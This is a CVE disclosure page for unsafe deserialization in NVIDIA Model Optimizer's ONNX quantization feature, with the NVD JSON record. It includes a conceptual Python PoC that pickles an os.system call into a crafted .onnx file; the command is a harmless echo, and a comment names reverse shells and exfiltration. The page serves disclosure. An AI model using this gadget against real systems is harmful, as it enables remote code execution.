CVE-2026-24141

import pickle import os # Conceptual Proof of Concept (PoC) for CVE-2026-24141 # This script demonstrates the creation of a payload that triggers # unsafe deserialization, assuming the underlying mechanism is pickle-based # or similar vulnerable serialization format used by the ONNX quantization feature. class ExploitClass: def __reduce__(self): # The command to execute (e.g., opening calculator as a benign proof) # In an attack scenario, this would be a reverse shell or data exfiltration script. return (os.system, ('echo "Vulnerable to Unsafe Deserialization"',)) # Serialize the malicious object malicious_data = pickle.dumps(ExploitClass()) # Simulate saving this data into a crafted ONNX file structure # The attacker would need to wrap this data appropriately to pass initial parsing # and reach the vulnerable deserialization routine. filename = "crafted_exploit_input.onnx" with open(filename, "wb") as f: f.write(malicious_data) print(f"[+] Generated PoC file: {filename}") print("[+] If processed by the vulnerable NVIDIA Model Optimizer, code execution may occur.")

{"cve": {"id": "CVE-2026-24141", "sourceIdentifier": "[email protected]", "published": "2026-03-24T21:16:27.203", "lastModified": "2026-03-25T15:41:58.280", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVIDIA Model Optimizer for Windows and Linux contains a vulnerability in the ONNX quantization feature, where a user could cause unsafe deserialization by providing a specially crafted input file. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, and information disclosure."}, {"lang": "es", "value": "NVIDIA Model Optimizer para Windows y Linux contiene una vulnerabilidad en la característica de cuantificación ONNX, donde un usuario podría causar una deserialización insegura al proporcionar un archivo de entrada especialmente diseñado. Un exploit exitoso de esta vulnerabilidad podría conducir a la ejecución de código, escalada de privilegios, manipulación de datos y revelación de información."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24141", "source": "[email protected]"}, {"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5798", "source": "[email protected]"}, {"url": "https://www.cve.org/CVERecord?id=CVE-2026-24141", "source": "[email protected]"}]}}